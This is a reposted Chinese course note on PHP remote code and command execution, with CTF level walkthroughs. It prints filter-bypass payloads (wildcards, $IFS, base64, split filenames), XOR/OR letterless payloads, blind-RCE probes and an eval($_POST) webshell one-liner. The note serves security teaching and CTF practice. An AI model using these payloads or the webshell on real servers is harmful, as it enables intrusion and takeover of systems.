第58天:RCE代码amp;命令执行amp;过滤绕过amp;异或无字符amp;无回显方案amp;黑白盒挖掘

news/2025/9/19 18:21:08/文章来源:https://www.cnblogs.com/HalfwayMousie/p/19101466

第58天:RCE代码&命令执行&过滤绕过&异或无字符&无回显方案&黑白盒挖掘

案例演示

RCE & 代码执行 & 命令执行

RCE-利用&绕过&异或&回显

白盒-CTF-RCE代码命令执行

黑盒-运行-RCE代码命令执行

知识点

1、RCE-原理-代码执行&命令执行

2、RCE-黑白盒-过滤绕过&不回显方案

RCE & 代码执行 & 命令执行

RCE代码执行简单案例
  • http://demo01/rce/test.php?c=phpinfo();

  • $code=phpinfo();

  • 将phpinfo();当做当前语言代码去执行 这就代码执行漏洞

  • 代码执行漏洞产生条件:可控变量code 触发函数eval

  • PHP常见代码执行函数

  • //eval()、assert()、preg_replace()、create_function()、
    //array_map()、call_user_func()、call_user_func_array()、array_filter()、uasort()
    
  • image-20250514214014521

  • image-20250514214049096

  • 代码执行:

    脚本——java,php,python

    产生——Web 源码、中间件平台、其他环境

    检测——白盒 代码审计

    检测——黑盒 漏扫工具、公开漏洞、手工看参数及功能点

    防御——敏感函数禁用、变量过滤或固定、WAF 产品

RCE命令执行简单案例

  • $cmd = ver ver查看系统版本信息

  • 将ver当作当前系统命令去执行 这就是命令执行函数

  • 产生条件:可控变量 cmd 触发函数system

  • PHP常见命令执行函数

  • //system()、exec()、shell_exec()、pcntl_exec()、popen()、proc_popen()、passthru()、等

  • image-20250514214602808

image-20250514215037922

  • 命令执行:

    系统——Linux、Windows

    产生——web 源码、中间件平台、其他环境

    检测——白盒 代码审计

    检测——黑盒 漏扫工具,公开漏洞,手工看参数及功能点

    防御——敏感函数禁用、变量过滤或固定、WAF 产品

RCE代码执行 ->命令执行

  • 一般命令执行无法执行代码 但是可以调用执行 两者可以相互转换
  • 这里就是用eval函数执行了system命令 相当于eval(system('ver')) 达成了代码执行和命令执行的相互转换

image-20250514215631058

image-20250514215655607

RCE命令执行 ->代码执行

  • 用php去运行代码 创建一个1.php文件里面写上phpinfo();

  • 在cmd里面 运行 php 1.php

  • image-20250514220632916

  • touch  名字缩写.php
    echo  '<?php eval($_POST['888']); ?>'  >  名字缩写.php
    

2.Python:

eval exec subprocess os.system commands

3.Java:

Java 中没有类似 php 中 eval 函数这种直接可以将字符串转化为代码执行的函数,

但是有反射机制,并且有各种基于反射机制的表达式引擎,如: OGNL、SpEL、MVEL

RCE-利用&绕过&异或&回显

  • 在本地目录下面创建一个文件 夹 flag
  • image-20250515113421293

关键字过滤 - 过滤 flag

如何通不同的方式读取flag

通配符

flag=fl*
cat fl*
cat ?la* //?代表占位符
image-20250515113916832

转义符号

ca\t /fl\ag
cat fl''ag
image-20250515114020118

使用空变量∗ 和 *和∗和@,x , x,x,{x}绕过

ca$*t fl$*ag
ca$@t fl$@ag //$@是linux里面声明变量 但是$@没有赋值 所以为空 因此干扰到了flag的匹配
ca$5t f$5lag
ca${2}t f${2}lag
image-20250515114407999

拼接法

a=fl;b=ag;cat$IFS$a$b //$IFS代表空格 写不写无所谓

image-20250515114622451

反引号绕过

cat `ls`   //在php中这个`反引号代表执行命令的意思   在当前目录下只有flag 用cat执行ls命令读取flag结果

编码绕过

echo 'flag' | base64
cat `echo ZmxhZwo= | base64 -d`

组合绝活

touch "ag"
touch "fl\\"
touch "t \\"
touch "ca\\"
ls -t >shell  -t是指以时间来展示文件(从新到旧的顺序执行)
sh shell
#  \指的是换行
#  ls -t是将文本按时间排序输出
#  ls -t >shell  将输出输入到shell文件中
#  sh将文本中的文字读取出来执行

image-20250515115739406

过滤执行命令(如cat tac等)

more:一页一页的显示档案内容 
less:与 more 类似
head:查看头几行
tac:从最后一行开始显示,可以看出 tac 是 cat 的反向显示
tail:查看尾几行
nl:显示的时候,顺便输出行号
od:以二进制的方式读取档案内容
vi:一种编辑器,这个也可以查看
vim:一种编辑器,这个也可以查看
sort:可以查看
uniq:可以查看
file -f:报错出具体内容
sh /flag 2>%261 //报错出文件内容
curl file:///root/f/flag
strings flag
uniq -c flag
bash -v flag
rev flag
image-20250515125712280

过滤执行空格

%09(url传递)(cat%09flag.php)
cat${IFS}flag
a=fl;b=ag;cat$IFS$a$b
{cat,flag}
image-20250515120230700
  • 就是传入的代码 使用正则匹配检测是否含有字母或数字(i 表示不区分大小写)。如果包含,就立即 die('hacker')

如何绕过?

  • 使用异或运算生成无符号的过滤

  • 1、异或:rce-xor.php & rce-xor.py绕过

  • 会在当前目录下面生成一个res.txt

  • 再在pycharm中使用rce-xor.py 运行res.txt 输入你要执行的函数和命令就会在下方生成一段payload 放到浏览器执行 显示信息

  • ("%08%02%08%08%05%0d"^"%7b%7b%7b%7c%60%60")("%08%05%09"^"%7e%60%7b");
    
  • image-20250515121244297
  • image-20250515121422300

  • image-20250515124343272

  • image-20250515124653912

  • 2.或: rce-xor-or.php & rce-xor-or.py绕过

  • 这个跟上面的步骤一样

  • ("%13%19%13%14%05%0d"|"%60%60%60%60%60%60")("%17%08%0f%01%0d%09"|"%60%60%60%60%60%60");
    
  • image-20250515125010130

  • image-20250515125201584

  • image-20250515125343917

无回显利用

简单案例

  • error_reporting(0);关闭所有错误输出,避免用户看到警告或报错信息。
  • 我们无法从当前页面来知道我们的代码是否运行
  • image-20250515130045292

如何无回显确定RCE漏洞存在

第一种:无回显写个文件访问查看

  • 我们在后面写入文件 http://demo01/rce/rce-nodisplay.php?code=echo 123> 1.txt
  • 访问1.txt 确定我们写入的文件成功 漏洞存在
  • image-20250515130459668
  • image-20250515130811771

第二种 直接对外访问接受

  • 使用ping命令执行查看是否成功
  • 平台:CEYE - Monitor service for security testing
  • image-20250515131449930
  • image-20250515131423009

白盒-CTF-RCE代码命令执行

29-通配符

  1. 这关把flag给过滤掉了 我们使用*模糊查询去绕过检测
  2. 这里使用eval函数使用代码执行去调用命令执行?c=system('tac fla*');
image-20250530125021022

image-20250530125304702

30-取代函数&通配符&管道符

  1. 这关从代码可知将flag/system/php给进行了过滤
  2. 这里使用echo 将exec执行命令 ?c=echo exec('cat fla*');
image-20250530125626637

image-20250530125727928

31-参数逃逸

  1. 这关将/flag|system|php|cat|sort|shell|都进行了过滤 但是依旧是没有过滤exec可以利用上一关的思路
  2. 这里我们使用?c=eval($_GET[x]);&x=system('tac flag.php');来进行绕过
image-20250530130018483

image-20250530130416976

32~36-配合包含&伪协议

黑盒-运行-RCE代码命令执行

RCE漏洞的本质就是 :代码中是否运行了危险函数?,这些危险函数是否可控?,有没有有效的输入过滤和输出转义?

代码在线运行平台测试

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/907999.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

057-Web攻防-SSRFDemo源码Gopher项目等

057-Web攻防-SSRF&Demo源码&Gopher项目等 知识点知识点: 1、SSRF-原理-外部资源加载 2、SSRF-利用-伪协议&无回显 3、SSRF-挖掘-业务功能&URL参数案例演示1、SSRF-原理&挖掘&利用&修复 2…

060-WEB攻防-PHP反序列化POP链构造魔术方法流程漏洞触发条件属性修改

060-WEB攻防-PHP反序列化&POP链构造&魔术方法流程&漏洞触发条件&属性修改 知识点: 1、PHP-反序列化-应用&识别&函数 2、PHP-反序列化-魔术方法&触发规则 3、PHP-反序列化-联合漏洞&P…

059-Web攻防-XXE安全DTD实体复现源码等

059-Web攻防-XXE安全&DTD实体&复现源码等 知识点 XML&XXE-传输-原理&探针&利用&玩法 XML&XXE-黑盒-JS&黑盒测试&类型修改 XML&XXE-白盒-CMS&PHPSHE&无回显什么是XML?…

061-WEB攻防-PHP反序列化原生类TIPSCVE绕过漏洞属性类型特征

061-WEB攻防-PHP反序列化&原生类TIPS&CVE绕过漏洞&属性类型特征知识点 1、PHP-反序列化-属性类型&显示特征 2、PHP-反序列化-CVE绕过&字符串逃逸 3、PHP-反序列化-原生类生成&利用&配合1、…

051-Web攻防-文件安全目录安全测试源码等

051-Web攻防-文件安全&目录安全&测试源码等 知识点1、文件安全-前后台功能点-下载&读取&删除 2、目录安全-前后台功能点-目录遍历&目录穿越演示案例:➢文件安全-下载&删除-案例黑白盒 ➢目录…

Dilworth定理及其在算法题中的应用

1. Dilworth定理 Dilworth定理由数学家Robert P. Dilworth于1950年提出,它描述了偏序集中链和反链之间的关系。偏序集:一个集合 equipped with a partial order(即一个自反、反对称、传递的关系)。 链:偏序集的一…

error: xxxxx does not have a commit checked out

$ git commit -m "test" *error: AW30N does not have a commit checked outfatal: updating files failed解决方法: 删除多余的文件夹AW30N

049-WEB攻防-文件上传存储安全OSS对象分站解析安全解码还原目录执行

049-WEB攻防-文件上传&存储安全&OSS对象&分站&解析安全&解码还原&目录执行-cnblog#文件-解析方案-执行权限&解码还原 1、执行权限文件上传后存储目录不给执行权限 原理:开启禁止目录执行…

云原生周刊:MetalBear 融资、Chaos Mesh 漏洞、Dapr 1.16 与 AI 平台新趋势

云原生热点 MetalBear 获得 1250 万美元种子轮融资,推动 Kubernetes 开发解决方案 以色列初创公司 MetalBear 宣布完成 1250 万美元种子轮融资,由 TLV Partners 领投,TQ Ventures、MTF、Netz Capital 及多位知名天使…

AI一周资讯 250913-250919

原文: https://mp.weixin.qq.com/s/bnJ-kyOojPi6rqgx0NOXxg 阿里版Cursor正式收费!Qoder全球推出付费订阅,小白用了都说“最懂我” 2025年9月15日,阿里AI编程平台Qoder(被称为“阿里版Cursor”)面向全球用户正式推…

045-WEB攻防-PHP应用SQL二次注入堆叠执行DNS带外功能点黑白盒条件-cnblog

045-WEB攻防-PHP应用&SQL二次注入&堆叠执行&DNS带外&功能点&黑白盒条件-cnblog PHP-MYSQL-二次注入-DEMO&74CMS1、DEMO-用户注册登录修改密码1.注册新用户时,将注入的内容包含在注册的用户名…

linux 命令语句

rt 快csp初赛了,发现s组第一题一般是linux 命令语句,碎屑。 c cat:连接和显示文件内容 cd:切换工作目录 chmod:修改文件或目录的权限 chown:修改文件或目录的所有者 cp:复制文件或目录 d df/du:显示磁盘使用情…

用 Kotlin 实现英文数字验证码识别

在本教程中,我们将使用 Kotlin 和 Tesseract OCR 库实现对英文数字验证码的识别。Tesseract 是一个开源的 OCR 引擎,能够从图像中提取文本内容。结合 Kotlin 的简洁语法,我们可以高效地完成这个任务。环境准备 (1)…

UM2003A 一款 200 ~ 960MHz ASK/OOK +18dBm 发射功率的单发射

UM2003A 一款 200 ~ 960MHz ASK/OOK +18dBm 发射功率的单发射Si24R03 是一款高度集成的低功耗 SOC 芯片,其集成了基于 RISC-V 核的低功耗 MCU 和工作在 2.4GHz ISM 频段的无线收发器模块。 MCU 模块具有低功耗、L…

达芬奇(DaVinci Reslove)字体文件 bugb标签

今天有小伙伴 突然 反馈 字幕轨导 execl的插件 字幕没有导出来。我拿到 srt文件是 文件1这样格式,我导入字幕轨后 ,再导出来 格式变了 多了 一个 <…

语音芯片怎样挑选?语音芯片关键选型要点?

语音芯片怎样挑选?语音芯片关键选型要点? 选择语音芯片需根据具体应用场景和性能需求进行综合评估,以下是关键选型要点: 一、核心性能参数 1、采样率与信噪比 高采样率(如16位ADC)可减少声音失真,信噪比≥75dB能…

KingbaseES Schema权限及空间限额

一、权限授予操作 1. 基础权限赋予 1.1 创建测试环境-- 1.创建测试用户 test=# CREATE USER schema_user WITH PASSWORD Schema@123; CREATE ROLE-- 2.创建测试Schema test=# CREATE SCHEMA test_schema AUTHORIZATION…

UM2003A 一款 200 ~ 960MHz ASK/OOK +18dBm 发射功率的单发射芯片

UM2003A 一款 200 ~ 960MHz ASK/OOK +18dBm 发射功率的单发射芯片UM2003A 是一款工作于 200 ~ 960MHz 频段的单片集成、高性能、可独立运行的 OOK 发射器。内部集成的 OTP 方便用户对各种射频参数以及特色功能进行编程…

HTTP库开发实战:核心库与httpplus扩展库示例解析

实战导向的HTTP库开发教程!本文以核心库基础功能为起点,结合httpplus扩展库示例,演示如何高效实现HTTP协议相关功能。 一、两个库有何不同? 首先需要了解,LuatOS采用核心库和扩展库的模块化设计,核心库负责底层与…

QMT交易系统向服务器同步订单丢失问题排查

QMT交易系统向服务器同步订单丢失问题排查1.挂单系统报错,异步挂单后订单挂单回调更新OrderID报错:查找对象为空,起初以为是多线程共享对象属性同步不及时造成的,后来发现在异步挂单执行完毕才对RequestOrderStock…